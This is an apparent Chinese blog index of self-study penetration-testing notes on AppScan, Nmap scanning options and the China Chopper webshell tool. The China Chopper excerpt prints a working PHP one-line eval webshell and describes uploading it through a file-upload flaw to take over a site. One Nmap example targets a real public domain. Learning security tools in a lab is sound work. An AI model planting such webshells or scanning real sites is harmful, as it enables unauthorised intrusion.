- 博客(6)
- 收藏
- 关注
RSS订阅原创 自学渗透第六天----Appscan
自学渗透第六天----Appscan一、基础扫描中的注意点(1)该页面“其他服务器和域”项是指该站点的子域名等,需要手动输入。(2)登录方式一般用于需要登录验证的网站,对你的登录行为进行记录。(3)启动方式中,手动探索指弹出ie浏览框,由用户手动点击浏览、操作目标网站中的链接选项,由Appscan进行被动记录。下面的扫描专家是一个新手向分析工具,可不勾选。(4)初步扫描结束后,需选择进一步扫描或者直接进入漏洞测试。(5)没了,向导很详细,没啥好写的...
2020-05-24 21:00:30
201
原创 自学渗透第四天--中国菜刀
自学渗透第四天–中国菜刀一、如何使用中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。(1)首先将一句话木马上传至网站后台。(2)运行该文件,确认文件上传成功。(3)复制该链接到中国菜刀,并输入相应的密码。(4)成功获取网站shell。二、常用功能1、上传本地文件到网站后台。2、下载在线文件至网站后台。将欲下载的文件链接添加至下载框即可由于某
2020-05-12 13:05:27
1181
1
原创 Nmap学习笔记第三天
Nmap学习笔记第三天一、结果比较工具的使用(1)将欲比较的两次扫描结果输出到文件中(2)使用结果比较工具选定两个文件进行比较二、使用指定的网卡进行操作默认状态下nmap会依次尝试所有网卡来执行扫描命令,不同的网卡之间数据互不联通,使用指定网卡则可以减少扫描时间,提高扫描效率。(1)查看本机所有网卡名称:nmap --iflist(2)根据需要扫描的目标来选择对应的网卡:nmap -e interface CIDR如若想探测192.168.0.102/24所在网段的存活主机,应当使用上
2020-05-10 14:19:38
285
原创 Nmap学习笔记第二天
Nmap学习笔记第二天一、端口扫描技巧(1)针对某个端口进行扫描: nmap -p端口号 域名/IP(2)针对多个端口进行扫描:nmap -p 端口号,端口号 域名/IP(3)针对某个范围端口进行扫描: nmap -p1-100 域名/IP(4)对所有端口进行扫描:nmap -p- 域名/IP(5)针对某协议探测端口 eg:nmap -p T:22,U:53 www.baidu.com(6)通过协议名来扫描端口:nmap -p 协议名 域名/IP(7)通过协议名称范围进行扫描(不
2020-05-09 21:25:02
326
原创 Nmap学习笔记第一天
Nmap学习笔记第一天一、Nmap的下载与安装Nmap下载地址:https://nmap.org/download.html。在该网站找到最新版本Nmap下载链接,查看该网页前端代码,复制该下载链接至迅雷进行高速下载(直接点击链接用浏览器也可以下载,但下载速度只有十几KB)。二、Nmap的基础使用(扫描命令)1、基础扫描:nmap 域名/IP2、指定DNS服务器:–dns-serve...
2020-05-04 11:49:37
221
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人